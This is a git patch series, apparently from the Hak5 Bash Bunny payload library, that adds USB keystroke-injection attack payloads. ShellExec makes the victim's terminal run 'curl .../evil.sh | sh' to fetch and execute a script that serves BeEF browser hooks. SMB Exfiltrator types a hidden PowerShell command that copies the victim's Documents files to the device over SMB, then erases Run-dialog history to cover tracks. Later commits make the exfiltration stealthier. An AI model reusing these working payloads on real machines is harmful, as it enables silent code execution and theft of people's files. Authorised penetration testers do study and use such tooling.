From b30ff86c2c37920739c48713a097c80f7981226b Mon Sep 17 00:00:00 2001 From: Alex Flores Date: Wed, 15 Mar 2017 02:30:29 -0400 Subject: [PATCH 1/7] add ShellExec payload --- payloads/library/ShellExec/evil.sh | 6 ++++ payloads/library/ShellExec/hook.js | 1 + payloads/library/ShellExec/index.html | 12 +++++++ payloads/library/ShellExec/payload.txt | 49 ++++++++++++++++++++++++++ payloads/library/ShellExec/readme.md | 34 ++++++++++++++++++ 5 files changed, 102 insertions(+) create mode 100644 payloads/library/ShellExec/evil.sh create mode 100644 payloads/library/ShellExec/hook.js create mode 100644 payloads/library/ShellExec/index.html create mode 100644 payloads/library/ShellExec/payload.txt create mode 100644 payloads/library/ShellExec/readme.md diff --git a/payloads/library/ShellExec/evil.sh b/payloads/library/ShellExec/evil.sh new file mode 100644 index 00000000..5b355e78 --- /dev/null +++ b/payloads/library/ShellExec/evil.sh @@ -0,0 +1,6 @@ +!#/bin/bash + +# opens browsers to the bunny's index.html page + +[[ "$(uname)" == "Darwin" ]] && open http://172.16.64.1 +[[ "$(uname)" == "Linux" ]] && xdg-open http://172.16.64.1 diff --git a/payloads/library/ShellExec/hook.js b/payloads/library/ShellExec/hook.js new file mode 100644 index 00000000..8454efc5 --- /dev/null +++ b/payloads/library/ShellExec/hook.js @@ -0,0 +1 @@ +alert('This is where your evil JavaScript file would go') diff --git a/payloads/library/ShellExec/index.html b/payloads/library/ShellExec/index.html new file mode 100644 index 00000000..c026f1ea --- /dev/null +++ b/payloads/library/ShellExec/index.html @@ -0,0 +1,12 @@ + + + + + + +Nothing to see here! + + + + + diff --git a/payloads/library/ShellExec/payload.txt b/payloads/library/ShellExec/payload.txt new file mode 100644 index 00000000..970f723f --- /dev/null +++ b/payloads/library/ShellExec/payload.txt @@ -0,0 +1,49 @@ +#!/bin/bash + +# Title: ShellExec +# Author: audibleblink +# Target: Mac/Linux +# Version: 1.0 +# +# Create a web server on the BashBunny and forces +# the victim download and execute a script. +# +# White | Ready +# Ammber blinking | Waiting for server +# Blue blinking | Attacking +# Green | Finished + +LED R G B +ATTACKMODE ECM_ETHERNET HID VID_0X05AC PID_0X021E + +source bunny_helpers.sh + +# switch to payload directory +cd /root/udisk/payloads/$SWITCH_POSITION + +# starting server +LED R G 500 +python -c "import SimpleHTTPServer; import BaseHTTPServer; h=BaseHTTPServer.HTTPServer(('$HOST_IP', 80),SimpleHTTPServer.SimpleHTTPRequestHandler); h.serve_forever();" &> server.log & + +# wait until port is listening +while ! nc -z $HOST_IP 80; do sleep 0.2; done + +# attack commences +LED B 500 + +Q GUI SPACE +Q DELAY 300 +Q STRING terminal +Q DELAY 100 +Q ENTER +Q DELAY 2000 + +# Q ALT F2 # swap with block above for linux +# Q DELAY 100 + +Q STRING curl "http://$HOST_IP/evil.sh" \| sh +# in case curl isn't installed +# Q STRING wget -O - "http://$HOST_IP/evil.sh" \| sh +Q ENTER + +LED G diff --git a/payloads/library/ShellExec/readme.md b/payloads/library/ShellExec/readme.md new file mode 100644 index 00000000..3caa2bf8 --- /dev/null +++ b/payloads/library/ShellExec/readme.md @@ -0,0 +1,34 @@ +# ShellExec + +Author: audibleblink +Version: 1.0 + +## Description + +Serves malicious scripts or web pages from the Bunny and forces +victims to curl and execute those scripts. Scripts can also force +browsers to open a url on the bunny to do things like serve BeEF +hooks. + +## Configuration + +evil.py - script that is fetched with DuckyScript +(provided script opens a web page that serves a BeEF hook ) + +hook.js - the aforementioned BeEF hook + +index.html - BeEF hook delivery page + +## Requirements + +Just plug and play + +## Status + +| LED | Status | +| --------- | ----------- | +| White | Ready | +| Amber blinking | Waiting for server | +| Blue blinking | Attacking | +| Green | Finished | + From 448aea41c39700ba78766e04cdf8628b61558842 Mon Sep 17 00:00:00 2001 From: Alex Flores Date: Thu, 16 Mar 2017 18:07:15 -0400 Subject: [PATCH 2/7] monkey patch fqdn search in BaseHTTPServer --- payloads/library/ShellExec/payload.txt | 21 ++++++++++++++++++--- 1 file changed, 18 insertions(+), 3 deletions(-) diff --git a/payloads/library/ShellExec/payload.txt b/payloads/library/ShellExec/payload.txt index 970f723f..48cda887 100644 --- a/payloads/library/ShellExec/payload.txt +++ b/payloads/library/ShellExec/payload.txt @@ -18,12 +18,27 @@ ATTACKMODE ECM_ETHERNET HID VID_0X05AC PID_0X021E source bunny_helpers.sh -# switch to payload directory -cd /root/udisk/payloads/$SWITCH_POSITION +payload_dir=/root/udisk/payloads/$SWITCH_POSITION +log_file=$payload_dir/shellexec.log + +cd $payload_dir # starting server LED R G 500 -python -c "import SimpleHTTPServer; import BaseHTTPServer; h=BaseHTTPServer.HTTPServer(('$HOST_IP', 80),SimpleHTTPServer.SimpleHTTPRequestHandler); h.serve_forever();" &> server.log & + +cat <> $log_file & +import SimpleHTTPServer +import BaseHTTPServer +import SocketServer + +#Disable logging DNS lookups +BaseHTTPServer.BaseHTTPRequestHandler.address_string = lambda self: str('$TARGET_IP') + +settings = ('$HOST_IP',80) +Handler = SimpleHTTPServer.SimpleHTTPRequestHandler +httpd = SocketServer.TCPServer(settings, Handler) +httpd.serve_forever(); +EOF # wait until port is listening while ! nc -z $HOST_IP 80; do sleep 0.2; done From 8582c6237623e1c3fcc7da67b11663b40d119a48 Mon Sep 17 00:00:00 2001 From: Alex Flores Date: Thu, 16 Mar 2017 18:22:38 -0400 Subject: [PATCH 3/7] iptables are always the answer --- payloads/library/ShellExec/payload.txt | 18 ++++-------------- 1 file changed, 4 insertions(+), 14 deletions(-) diff --git a/payloads/library/ShellExec/payload.txt b/payloads/library/ShellExec/payload.txt index 48cda887..bdf77e61 100644 --- a/payloads/library/ShellExec/payload.txt +++ b/payloads/library/ShellExec/payload.txt @@ -26,22 +26,12 @@ cd $payload_dir # starting server LED R G 500 -cat <> $log_file & -import SimpleHTTPServer -import BaseHTTPServer -import SocketServer - -#Disable logging DNS lookups -BaseHTTPServer.BaseHTTPRequestHandler.address_string = lambda self: str('$TARGET_IP') - -settings = ('$HOST_IP',80) -Handler = SimpleHTTPServer.SimpleHTTPRequestHandler -httpd = SocketServer.TCPServer(settings, Handler) -httpd.serve_forever(); -EOF +# disallow outgoing dns requests so server starts immediately +iptables -A OUTPUT -p udp --dport 53 -j DROP +python -m SimpleHTTPServer 80 # wait until port is listening -while ! nc -z $HOST_IP 80; do sleep 0.2; done +while ! nc -z localhost 80; do sleep 0.2; done # attack commences LED B 500 From c9e41fc7d9ccee5cd31d16b067e7b3bacad8dbe8 Mon Sep 17 00:00:00 2001 From: Sebastian Kinne Date: Tue, 21 Mar 2017 08:19:12 +1100 Subject: [PATCH 4/7] Payload: Fixed CaptivePortal --- payloads/library/Captiveportal/README.md | 2 +- payloads/library/Captiveportal/payload.txt | 11 +++++------ 2 files changed, 6 insertions(+), 7 deletions(-) diff --git a/payloads/library/Captiveportal/README.md b/payloads/library/Captiveportal/README.md index 0d70593d..d6dc1789 100644 --- a/payloads/library/Captiveportal/README.md +++ b/payloads/library/Captiveportal/README.md @@ -1,7 +1,7 @@ # Captive Portal for the Bash Bunny Author: Sebkinne -Version: 1.0 +Version: 1.1 ## Description diff --git a/payloads/library/Captiveportal/payload.txt b/payloads/library/Captiveportal/payload.txt index c044eeac..13e8649e 100644 --- a/payloads/library/Captiveportal/payload.txt +++ b/payloads/library/Captiveportal/payload.txt @@ -2,10 +2,7 @@ # # Title: Captiveportal # Author: Sebkinne -# Version: 1.0 - -# Usage of bunny_helpers.sh to avoid problems with find in function startCaptiveportal -https://forums.hak5.org/index.php?/topic/40237-install-tools/ +# Version: 1.1 # Add or remove inputs here INPUTS=(username password) @@ -18,6 +15,9 @@ ATTACKMODE RNDIS_ETHERNET # DO NOT EDIT BELOW THIS LINE # ################################################################## +source bunny_helpers.sh +WORKINGPATH="/root/udisk/payloads/$SWITCH_POSITION" + # Sets up iptable forwarding and filters function setupNetworking() { echo 1 > /proc/sys/net/ipv4/ip_forward @@ -30,8 +30,7 @@ function setupNetworking() { # Find payload directory and execute payload function startCaptiveportal() { -# cd $(dirname $(find /root/udisk/payloads/ -name portal.html)) - cd /root/udisk/payloads/$SWITCH_POSITION + cd $WORKINGPATH chmod +x captiveportal ./captiveportal ${INPUTS[@]} } From 42819e4e6b519e53247cae1c33f05acaf8006560 Mon Sep 17 00:00:00 2001 From: Darren Kitchen Date: Tue, 21 Mar 2017 14:12:41 +0700 Subject: [PATCH 5/7] Add SMB Exfiltrator Payload This is an awesome payload check out Hak5 episode 2202 --- payloads/library/smb_exfiltrator/payload.txt | 115 +++++++++++++++++++ payloads/library/smb_exfiltrator/readme.md | 28 +++++ 2 files changed, 143 insertions(+) create mode 100644 payloads/library/smb_exfiltrator/payload.txt create mode 100644 payloads/library/smb_exfiltrator/readme.md diff --git a/payloads/library/smb_exfiltrator/payload.txt b/payloads/library/smb_exfiltrator/payload.txt new file mode 100644 index 00000000..06310fa0 --- /dev/null +++ b/payloads/library/smb_exfiltrator/payload.txt @@ -0,0 +1,115 @@ +#!/bin/bash +# +# Title: SMB Exfiltrator +# Author: Hak5Darren +# Version: 1.0 +# Category: Exfiltration +# Target: Windows XP SP3+ (Powershell) +# Attackmodes: HID, Ethernet +# +# +# Red Blink Fast.......Impacket not found +# Red Blink Slow.......Target did not acquire IP address +# Amber Blink Fast.....Initialization +# Amber................HID Stage +# Purple Blink Fast....Ethernet Stage +# Blue Interstitial....Receiving Files +# White................Moving loot to mass storage +# Green................Finished +# +# OPTIONS +LOOTDIR=/root/udisk/loot/smb_exfiltrator +EXFILTRATE_FILES="*.pdf" +CLEARTRACKS="yes" # yes or no + +# Initialization +LED R G 100 + + +# Check for impacket. If not found, blink fast red. +if [ ! -d /pentest/impacket/ ]; then + LED R 100 + exit 1 +fi + + +# HID STAGE +# Runs minimized powershell waiting for Bash Bunny to appear as 172.16.64.1. +# Once found, initiates file copy and exits +LED R G +ATTACKMODE HID +QUACK GUI r +QUACK DELAY 500 +QUACK STRING "powershell -windowStyle minimized \"while (\$true) { If (Test-Connection 172.16.64.1 -count 1 -quiet) { sleep 2; net use \\\172.16.64.1\e guest /USER:guest; robocopy \$ENV:UserProfile\Documents \\\172.16.64.1\e $EXFILTRATE_FILES /S; exit } }\"" +QUACK ENTER + +# Clear tracks? +if [ $CLEARTRACKS == "yes" ]; then + QUACK DELAY 500 + QUACK GUI r + QUACK DELAY 500 + QUACK STRING powershell -windowStyle minimized -Exec Bypass "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue" + QUACK ENTER +fi + + +# ETHERNET STAGE +LED R B 100 +ATTACKMODE RNDIS_ETHERNET + + +# Setup SMB server to receive loot in staging area +mkdir -p /root/loot/smb_exfiltrator/temp/ +# house cleaning +rm -rf /root/loot/smb_exfiltrator/temp/* +# Fire up SMB Server +/pentest/impacket/examples/smbserver.py -comment 'That Place Where I Put That Thing That Time' e /root/loot/smb_exfiltrator/temp/ & + + +# Source bunny_helpers.sh to get environment variables +source bunny_helpers.sh + + +# Give target a chance to start exfiltration +sleep 2 + + +# Make loot directory based on hostname (increment for multiple uses) +mkdir -p $LOOTDIR +HOST=${TARGET_HOSTNAME} +# If hostname is blank set it to "noname" +[[ -z "$HOST" ]] && HOST="noname" +COUNT=$(ls -lad $LOOTDIR/$HOST* | wc -l) +COUNT=$((COUNT+1)) +mkdir -p $LOOTDIR/$HOST-$COUNT + + +# Check target IP address. If unset, blink slow red. +if [ -z "${TARGET_IP}" ]; then + LED R 1000 + exit 1 +fi + + +# Wait until exfiltration is complete +last=0 +current=1 +while [ "$last" != "$current" ]; do + last=$current + current=$(find /root/loot/smb_exfiltrator/temp/ -exec stat -c "%Y" \{\} \; | sort -n | tail -1) + LED B + sleep 1 + LED R B 100 + sleep 9 + # Files are still being copied. Loop. + # (Issue may exist if file takes longer than 10s to copy) +done + + +# Move files from staging area to loot directory +LED R G B +mv /root/loot/smb_exfiltrator/temp/* $LOOTDIR/$HOST-$COUNT +sync; sleep 1; sync + +# Trap is clean +LED G diff --git a/payloads/library/smb_exfiltrator/readme.md b/payloads/library/smb_exfiltrator/readme.md new file mode 100644 index 00000000..dc0fbbb0 --- /dev/null +++ b/payloads/library/smb_exfiltrator/readme.md @@ -0,0 +1,28 @@ +# SMB Exfiltrator + +* Author: Hak5Darren +* Version: Version 1.0 +* Target: Windows XP SP3+ (Powershell) +* Category: Exfiltration +* Attackmodes: HID, Ethernet + +## Description + +Exfiltrates select files from users's documents folder via SMB. +Liberated documents will reside in Bash Bunny loot directory under loot/smb_exfiltrator/HOSTNAME-# + +## Configuration + +Configured to copy PDF files by default. Change EXFILTRATE_FILES variable to desired. + +## STATUS + +| LED | Status | +| ------------------- | -------------------------------------- | +| Red (fast blink) | Impacket not found in /pentest | +| Red (slow blink) | Setup Failed. Target didn't obtain IP | +| Amber | Initialization | +| Purple (fast blink) | Switching to Mass Storage (optional) | +| Blue (interupt) | Receiving files | +| White | Files received, moving to mass storage | +| Green | Finished | From 2978c85d6a821d5ad5581ef596adae85485093b5 Mon Sep 17 00:00:00 2001 From: Surreal Date: Wed, 22 Mar 2017 16:13:32 -0400 Subject: [PATCH 6/7] Updated smb_exfiltrator to be more hidden Modified -WindowStyle to be hidden instead of minimized --- payloads/library/smb_exfiltrator/payload.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/payloads/library/smb_exfiltrator/payload.txt b/payloads/library/smb_exfiltrator/payload.txt index 06310fa0..850bfa80 100644 --- a/payloads/library/smb_exfiltrator/payload.txt +++ b/payloads/library/smb_exfiltrator/payload.txt @@ -40,7 +40,7 @@ LED R G ATTACKMODE HID QUACK GUI r QUACK DELAY 500 -QUACK STRING "powershell -windowStyle minimized \"while (\$true) { If (Test-Connection 172.16.64.1 -count 1 -quiet) { sleep 2; net use \\\172.16.64.1\e guest /USER:guest; robocopy \$ENV:UserProfile\Documents \\\172.16.64.1\e $EXFILTRATE_FILES /S; exit } }\"" +QUACK STRING "powershell -WindowStyle Hidden \"while (\$true) { If (Test-Connection 172.16.64.1 -count 1 -quiet) { sleep 2; net use \\\172.16.64.1\e guest /USER:guest; robocopy \$ENV:UserProfile\Documents \\\172.16.64.1\e $EXFILTRATE_FILES /S; exit } }\"" QUACK ENTER # Clear tracks? @@ -48,7 +48,7 @@ if [ $CLEARTRACKS == "yes" ]; then QUACK DELAY 500 QUACK GUI r QUACK DELAY 500 - QUACK STRING powershell -windowStyle minimized -Exec Bypass "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue" + QUACK STRING powershell -WindowStyle Hidden -Exec Bypass "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue" QUACK ENTER fi From 67005a8b0dbb67fbc80b46299cdcd73364b5f852 Mon Sep 17 00:00:00 2001 From: Darren Kitchen Date: Thu, 23 Mar 2017 07:55:59 +0700 Subject: [PATCH 7/7] Updated LED status and added discussion link --- payloads/library/smb_exfiltrator/readme.md | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/payloads/library/smb_exfiltrator/readme.md b/payloads/library/smb_exfiltrator/readme.md index dc0fbbb0..d5678884 100644 --- a/payloads/library/smb_exfiltrator/readme.md +++ b/payloads/library/smb_exfiltrator/readme.md @@ -21,8 +21,11 @@ Configured to copy PDF files by default. Change EXFILTRATE_FILES variable to des | ------------------- | -------------------------------------- | | Red (fast blink) | Impacket not found in /pentest | | Red (slow blink) | Setup Failed. Target didn't obtain IP | -| Amber | Initialization | -| Purple (fast blink) | Switching to Mass Storage (optional) | +| Purple | HID Stage | +| Purple (fast blink) | Ethernet Stage | | Blue (interupt) | Receiving files | | White | Files received, moving to mass storage | | Green | Finished | + +## Discussion +[Hak5 Forum Thread](https://forums.hak5.org/index.php?/topic/40509-payload-smb-exfiltrator/ "Hak5 Forum Thread")